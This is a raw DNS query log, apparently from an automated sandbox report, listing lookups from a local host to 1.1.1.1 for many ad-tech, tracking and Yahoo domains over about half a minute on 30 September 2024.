                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.142901897 CEST192.168.2.41.1.1.10x1e9aStandard query (0)ce.lijit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.143285990 CEST192.168.2.41.1.1.10x8977Standard query (0)ce.lijit.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.927428961 CEST192.168.2.41.1.1.10xf79Standard query (0)ib.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.927663088 CEST192.168.2.41.1.1.10x8861Standard query (0)ib.adnxs.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.933939934 CEST192.168.2.41.1.1.10x2d7cStandard query (0)match.adsby.bidtheatre.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.934386015 CEST192.168.2.41.1.1.10xe15Standard query (0)match.adsby.bidtheatre.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.587805033 CEST192.168.2.41.1.1.10x2683Standard query (0)dis.criteo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.588006973 CEST192.168.2.41.1.1.10x6cb7Standard query (0)dis.criteo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.844754934 CEST192.168.2.41.1.1.10x3304Standard query (0)rtb-csync.smartadserver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.844986916 CEST192.168.2.41.1.1.10xd4f1Standard query (0)rtb-csync.smartadserver.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.919209957 CEST192.168.2.41.1.1.10x1d1dStandard query (0)b1sync.zemanta.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:36.919441938 CEST192.168.2.41.1.1.10xb624Standard query (0)b1sync.zemanta.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.134936094 CEST192.168.2.41.1.1.10x4e1dStandard query (0)sync-pm.ads.yieldmo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.135231018 CEST192.168.2.41.1.1.10x272eStandard query (0)sync-pm.ads.yieldmo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.173146009 CEST192.168.2.41.1.1.10x5298Standard query (0)simage2.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.173146009 CEST192.168.2.41.1.1.10xd877Standard query (0)simage2.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.318125963 CEST192.168.2.41.1.1.10x8637Standard query (0)sync.1rx.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.318387985 CEST192.168.2.41.1.1.10xae3Standard query (0)sync.1rx.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.700126886 CEST192.168.2.41.1.1.10xaeb3Standard query (0)sync.intentiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.701842070 CEST192.168.2.41.1.1.10xc333Standard query (0)sync.intentiq.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.896240950 CEST192.168.2.41.1.1.10xcecaStandard query (0)widget.us.criteo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.896631956 CEST192.168.2.41.1.1.10xafeaStandard query (0)widget.us.criteo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.896940947 CEST192.168.2.41.1.1.10x6209Standard query (0)image2.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:37.897145033 CEST192.168.2.41.1.1.10x1fb6Standard query (0)image2.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:38.884056091 CEST192.168.2.41.1.1.10x64d2Standard query (0)sync.targeting.unrulymedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:38.884223938 CEST192.168.2.41.1.1.10x4008Standard query (0)sync.targeting.unrulymedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:39.071928978 CEST192.168.2.41.1.1.10x8e62Standard query (0)ssp-sync.criteo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:39.072072029 CEST192.168.2.41.1.1.10x4369Standard query (0)ssp-sync.criteo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:41.119350910 CEST192.168.2.41.1.1.10x8cb8Standard query (0)ap.lijit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:41.119497061 CEST192.168.2.41.1.1.10x40c1Standard query (0)ap.lijit.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:43.760499001 CEST192.168.2.41.1.1.10xf78cStandard query (0)dsp.nrich.aiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:43.760762930 CEST192.168.2.41.1.1.10x7203Standard query (0)dsp.nrich.ai65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:43.984745026 CEST192.168.2.41.1.1.10x84bfStandard query (0)s.ad.smaato.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:43.984894037 CEST192.168.2.41.1.1.10xb867Standard query (0)s.ad.smaato.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:44.720818043 CEST192.168.2.41.1.1.10x396eStandard query (0)prebid.a-mo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:44.721168041 CEST192.168.2.41.1.1.10x7d51Standard query (0)prebid.a-mo.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:45.036504030 CEST192.168.2.41.1.1.10x4d1dStandard query (0)cs.krushmedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:45.037041903 CEST192.168.2.41.1.1.10x1806Standard query (0)cs.krushmedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:45.942910910 CEST192.168.2.41.1.1.10x4dc2Standard query (0)sync.go.sonobi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:45.943279028 CEST192.168.2.41.1.1.10xf61dStandard query (0)sync.go.sonobi.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:46.102154970 CEST192.168.2.41.1.1.10xcda0Standard query (0)s0.2mdn.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:46.102322102 CEST192.168.2.41.1.1.10xae0eStandard query (0)s0.2mdn.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:46.231338978 CEST192.168.2.41.1.1.10xf48bStandard query (0)assets.a-mo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:46.231741905 CEST192.168.2.41.1.1.10xf6cfStandard query (0)assets.a-mo.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:46.901890993 CEST192.168.2.41.1.1.10x8d8fStandard query (0)id.rlcdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:46.903628111 CEST192.168.2.41.1.1.10x206aStandard query (0)id.rlcdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:47.037589073 CEST192.168.2.41.1.1.10xa9cbStandard query (0)s0.2mdn.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:47.037753105 CEST192.168.2.41.1.1.10x709eStandard query (0)s0.2mdn.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:47.118205070 CEST192.168.2.41.1.1.10xf6d8Standard query (0)cs.emxdgt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:47.118519068 CEST192.168.2.41.1.1.10xdb14Standard query (0)cs.emxdgt.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:47.460163116 CEST192.168.2.41.1.1.10xd306Standard query (0)assets.a-mo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:47.460357904 CEST192.168.2.41.1.1.10x9f7fStandard query (0)assets.a-mo.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:48.431859016 CEST192.168.2.41.1.1.10x5a41Standard query (0)pippio.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:48.432130098 CEST192.168.2.41.1.1.10xa0fStandard query (0)pippio.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:48.559849977 CEST192.168.2.41.1.1.10xb660Standard query (0)sonata-notifications.taptapnetworks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:48.560213089 CEST192.168.2.41.1.1.10x9967Standard query (0)sonata-notifications.taptapnetworks.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.125992060 CEST192.168.2.41.1.1.10x2006Standard query (0)ad.mrtnsvr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.126141071 CEST192.168.2.41.1.1.10x7872Standard query (0)ad.mrtnsvr.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.358673096 CEST192.168.2.41.1.1.10x2415Standard query (0)pool.admedo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.358920097 CEST192.168.2.41.1.1.10xc807Standard query (0)pool.admedo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.545607090 CEST192.168.2.41.1.1.10x3ec2Standard query (0)ipac.ctnsnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.545741081 CEST192.168.2.41.1.1.10x79efStandard query (0)ipac.ctnsnet.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.557102919 CEST192.168.2.41.1.1.10x93fStandard query (0)d5p.de17a.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.557332039 CEST192.168.2.41.1.1.10xe81aStandard query (0)d5p.de17a.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.568075895 CEST192.168.2.41.1.1.10xd455Standard query (0)dsp.360yield.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.568198919 CEST192.168.2.41.1.1.10x8021Standard query (0)dsp.360yield.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.578042030 CEST192.168.2.41.1.1.10x9a1cStandard query (0)core.iprom.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.578229904 CEST192.168.2.41.1.1.10x636eStandard query (0)core.iprom.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.581183910 CEST192.168.2.41.1.1.10x769bStandard query (0)id.a-mx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.581315994 CEST192.168.2.41.1.1.10x3042Standard query (0)id.a-mx.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.900238991 CEST192.168.2.41.1.1.10xc1eaStandard query (0)cm-supply-web.gammaplatform.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.900428057 CEST192.168.2.41.1.1.10x637bStandard query (0)cm-supply-web.gammaplatform.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.922652006 CEST192.168.2.41.1.1.10x2652Standard query (0)cm.adgrx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:49.922796965 CEST192.168.2.41.1.1.10x2937Standard query (0)cm.adgrx.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.102085114 CEST192.168.2.41.1.1.10xe9f4Standard query (0)green.erne.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.102222919 CEST192.168.2.41.1.1.10xb2a8Standard query (0)green.erne.co65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.151372910 CEST192.168.2.41.1.1.10x1ca5Standard query (0)a.tribalfusion.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.152383089 CEST192.168.2.41.1.1.10x54c5Standard query (0)a.tribalfusion.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.300467968 CEST192.168.2.41.1.1.10xb381Standard query (0)matching.truffle.bidA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.300607920 CEST192.168.2.41.1.1.10x10a7Standard query (0)matching.truffle.bid65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.664350986 CEST192.168.2.41.1.1.10x3869Standard query (0)pb-am.a-mo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.664520979 CEST192.168.2.41.1.1.10x5527Standard query (0)pb-am.a-mo.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.666207075 CEST192.168.2.41.1.1.10xf003Standard query (0)sync.a-mo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.666363001 CEST192.168.2.41.1.1.10x9302Standard query (0)sync.a-mo.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.819108963 CEST192.168.2.41.1.1.10x853cStandard query (0)s.tribalfusion.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:50.819277048 CEST192.168.2.41.1.1.10x31cdStandard query (0)s.tribalfusion.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:51.021020889 CEST192.168.2.41.1.1.10xca3cStandard query (0)pixel-eu.onaudience.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:51.021184921 CEST192.168.2.41.1.1.10x9f8eStandard query (0)pixel-eu.onaudience.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:51.610192060 CEST192.168.2.41.1.1.10xd2f2Standard query (0)rtb.openx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:51.610340118 CEST192.168.2.41.1.1.10xf373Standard query (0)rtb.openx.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:51.614439011 CEST192.168.2.41.1.1.10xd0d6Standard query (0)cm.adform.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:51.614684105 CEST192.168.2.41.1.1.10xd474Standard query (0)cm.adform.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:51.616724014 CEST192.168.2.41.1.1.10x7878Standard query (0)ssum.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:51.617360115 CEST192.168.2.41.1.1.10x96f3Standard query (0)ssum.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:52.216835022 CEST192.168.2.41.1.1.10x7bd0Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:52.217160940 CEST192.168.2.41.1.1.10x9fdfStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:53.175230980 CEST192.168.2.41.1.1.10x6515Standard query (0)stags.bluekai.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:53.175581932 CEST192.168.2.41.1.1.10x5893Standard query (0)stags.bluekai.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:53.688216925 CEST192.168.2.41.1.1.10x237bStandard query (0)prebid.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:53.688426971 CEST192.168.2.41.1.1.10xa381Standard query (0)prebid.adnxs.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:53.688971043 CEST192.168.2.41.1.1.10x2712Standard query (0)ow.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:53.689240932 CEST192.168.2.41.1.1.10xe163Standard query (0)ow.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:54.155635118 CEST192.168.2.41.1.1.10x7d7fStandard query (0)www.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:54.155787945 CEST192.168.2.41.1.1.10x1cbbStandard query (0)www.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:54.844880104 CEST192.168.2.41.1.1.10x8c0cStandard query (0)id.a-mx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:54.846009016 CEST192.168.2.41.1.1.10x4418Standard query (0)id.a-mx.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:55.692292929 CEST192.168.2.41.1.1.10x6d78Standard query (0)geo.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:55.692451954 CEST192.168.2.41.1.1.10xc775Standard query (0)geo.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:56.626813889 CEST192.168.2.41.1.1.10x7c81Standard query (0)ow.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:56.628288031 CEST192.168.2.41.1.1.10x71cdStandard query (0)ow.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:56.634582043 CEST192.168.2.41.1.1.10xd263Standard query (0)prebid.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:56.634819984 CEST192.168.2.41.1.1.10x71baStandard query (0)prebid.adnxs.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:56.833095074 CEST192.168.2.41.1.1.10x8f34Standard query (0)s.yimg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:56.833249092 CEST192.168.2.41.1.1.10xa3cfStandard query (0)s.yimg.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:57.060911894 CEST192.168.2.41.1.1.10xea3fStandard query (0)query2.finance.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:57.061172009 CEST192.168.2.41.1.1.10x4e5cStandard query (0)query2.finance.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:57.135801077 CEST192.168.2.41.1.1.10x25f3Standard query (0)s.yimg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:57.136199951 CEST192.168.2.41.1.1.10xe7d4Standard query (0)s.yimg.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:57.257766008 CEST192.168.2.41.1.1.10x7ef4Standard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:57.258912086 CEST192.168.2.41.1.1.10xd0f5Standard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:58.411250114 CEST192.168.2.41.1.1.10x8ff3Standard query (0)streamer.finance.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:58.411636114 CEST192.168.2.41.1.1.10x6a5cStandard query (0)streamer.finance.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:02.649981022 CEST192.168.2.41.1.1.10x7ae1Standard query (0)jac.yahoosandbox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:02.650132895 CEST192.168.2.41.1.1.10xc3d1Standard query (0)jac.yahoosandbox.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:03.697762012 CEST192.168.2.41.1.1.10xcc62Standard query (0)ups.analytics.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:03.697916031 CEST192.168.2.41.1.1.10xaa72Standard query (0)ups.analytics.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:03.799519062 CEST192.168.2.41.1.1.10x7e13Standard query (0)jac.yahoosandbox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:03.799659967 CEST192.168.2.41.1.1.10xdbeeStandard query (0)jac.yahoosandbox.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:03.917685032 CEST192.168.2.41.1.1.10x5d92Standard query (0)openweb.jac.yahoosandbox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:03.917877913 CEST192.168.2.41.1.1.10x6054Standard query (0)openweb.jac.yahoosandbox.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.223112106 CEST192.168.2.41.1.1.10xebdfStandard query (0)fastlane.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.223297119 CEST192.168.2.41.1.1.10x6d72Standard query (0)fastlane.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.750674963 CEST192.168.2.41.1.1.10x7df8Standard query (0)rtb.openx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.750821114 CEST192.168.2.41.1.1.10x609eStandard query (0)rtb.openx.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.753215075 CEST192.168.2.41.1.1.10x9089Standard query (0)ups.analytics.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.753437996 CEST192.168.2.41.1.1.10xb745Standard query (0)ups.analytics.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.763077974 CEST192.168.2.41.1.1.10xb012Standard query (0)prebid.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.763209105 CEST192.168.2.41.1.1.10xe2f5Standard query (0)prebid.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.838522911 CEST192.168.2.41.1.1.10x28c6Standard query (0)display.bidder.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.838824034 CEST192.168.2.41.1.1.10x7860Standard query (0)display.bidder.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.986138105 CEST192.168.2.41.1.1.10xd12bStandard query (0)tlx.3lift.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.986459017 CEST192.168.2.41.1.1.10x22b5Standard query (0)tlx.3lift.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:05.009324074 CEST192.168.2.41.1.1.10xdfc0Standard query (0)jac.yahoosandbox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:05.009469032 CEST192.168.2.41.1.1.10x5e17Standard query (0)jac.yahoosandbox.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:05.148149967 CEST192.168.2.41.1.1.10xd7b7Standard query (0)htlb.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:05.148292065 CEST192.168.2.41.1.1.10x5ce3Standard query (0)htlb.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:05.770230055 CEST192.168.2.41.1.1.10x8d13Standard query (0)c2shb-oao.ssp.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:05.770371914 CEST192.168.2.41.1.1.10x482Standard query (0)c2shb-oao.ssp.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:07.263180971 CEST192.168.2.41.1.1.10x590eStandard query (0)trc-events.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:07.263312101 CEST192.168.2.41.1.1.10xe916Standard query (0)trc-events.taboola.com65IN (0x0001)false
